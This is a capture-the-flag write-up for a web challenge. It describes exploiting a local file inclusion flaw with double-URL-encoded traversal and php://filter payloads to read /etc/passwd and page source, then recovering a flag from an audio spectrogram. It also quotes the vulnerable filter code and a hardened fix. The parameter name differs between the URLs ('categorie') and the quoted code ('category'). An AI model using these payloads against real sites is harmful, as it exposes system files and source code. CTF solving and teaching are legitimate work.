The challenge statement gives us the following site: https://cloud.midnightflag.fr/index.php

By manipulating the URL, I quickly realize that an LFI vulnerability is exploitable.

So I start by injecting a double-URL-encoded payload in order to retrieve the contents of the file /etc/passwd:

https://cloud.midnightflag.fr/index.php?categorie=..%252f..%252f..%252fetc%252fpasswd

The response contains the file's contents, but I don't see any exploitable user or service:

private

So I decide to retrieve the source of index.php using the php://filter wrapper:

https://cloud.midnightflag.fr/index.php?categorie=php:%252F%252Ffilter%252Fconvert.base64-encode%252Fresource=index.php

With this request, I get the base64-encoded content of index.php directly on the web page.

After decoding, I see the following PHP code, which implements the LFI filter (the double encoding bypasses this function because the filter runs on the once-decoded value, and urldecode() is only applied afterwards):

    <?php
    // Strips traversal tokens ('..', '../', '/') from the raw parameter value.
    function lfi_filter($value)
    {
        $omit_words = array('..', '../', '/');
        rsort($omit_words);
        $new_string = str_replace($omit_words, '', $value);
        return $new_string;
    }

    if (isset($_GET["category"])) {
        // The filter sees the value after the web server's single decode;
        // urldecode() runs only after filtering, so encoded slashes survive.
        $categorie = lfi_filter($_GET["category"]);
        include urldecode($categorie);
    } else {
        include 'home.php';
    }
    ?>
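To make the root cause concrete, here is an added Python model of the flow above (filter first, urldecode() second, so a double-encoded slash survives the filter) next to a hardened variant that decodes before validating and allowlists the include target. This is illustrative code written for this writeup, not the challenge's PHP; BASE_DIR and the allowlist are assumed values.

```python
import os
from typing import Optional
from urllib.parse import unquote

BASE_DIR = "/var/www/html"  # assumed web root, not taken from the page


def lfi_filter(value: str) -> str:
    """Model of the PHP lfi_filter(): rsort() puts '/' first, then '../', then '..'."""
    for word in sorted(["..", "../", "/"], reverse=True):
        value = value.replace(word, "")
    return value


def vulnerable_include_target(raw_param: str) -> str:
    """Model of index.php: the web server decodes once (%252f -> %2f),
    the filter runs on that value, and urldecode() runs afterwards (%2f -> /)."""
    once_decoded = unquote(raw_param)
    filtered = lfi_filter(once_decoded)
    return unquote(filtered)


def hardened_include_target(
    raw_param: str, allowed=("home.php", "private.php")
) -> Optional[str]:
    """Hardened model: fully decode first, then allowlist the name and
    confine the resolved path to BASE_DIR. Returns None when rejected."""
    name = unquote(unquote(raw_param))
    if name not in allowed:
        return None
    path = os.path.normpath(os.path.join(BASE_DIR, name))
    if os.path.dirname(path) != BASE_DIR:
        return None
    return path
```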

At this point I search around for a while before continuing the challenge, because the recovered PHP code gives no additional information.

Since fuzzing is not allowed on this challenge, it’s time for #guessing!

Going by the challenge title and the structure of the site, after several attempts I try to reach the page private.php via https://cloud.midnightflag.fr/index.php?categorie=private.php and I get a response!

So I get the source code of this page with the same payload as before:

https://cloud.midnightflag.fr/index.php?categorie=php:%252F%252Ffilter%252Fconvert.base64-encode%252Fresource=private.php

I get the following source code with an interesting comment containing hex-escaped ASCII:

<section>
      <td><img width="50%" class="center" src="categorie\Why-So-Sad-Funny-Clown-Face-Picture.jpg" alt="personal_attack.jpg"></td>
      <!--don't leak (\x70\x65\x72\x73\x6F\x6E\x61\x6C) -->
</section>

After conversion, I get the following value: personal

I assume the site has a personal category, so I go to the URL https://cloud.midnightflag.fr/index.php?categorie=personal.php, which contains an audio recording in WAV format.

After downloading the recording, I open it in Audacity to analyze its content.

The sound of the recording leads me to believe that information is hidden in the spectrogram!

After reversing the audio track and analyzing the spectrogram, I recover the following information:

cloud2

Flag: MCTF{H1d3_Y0uR_S3cRe7s}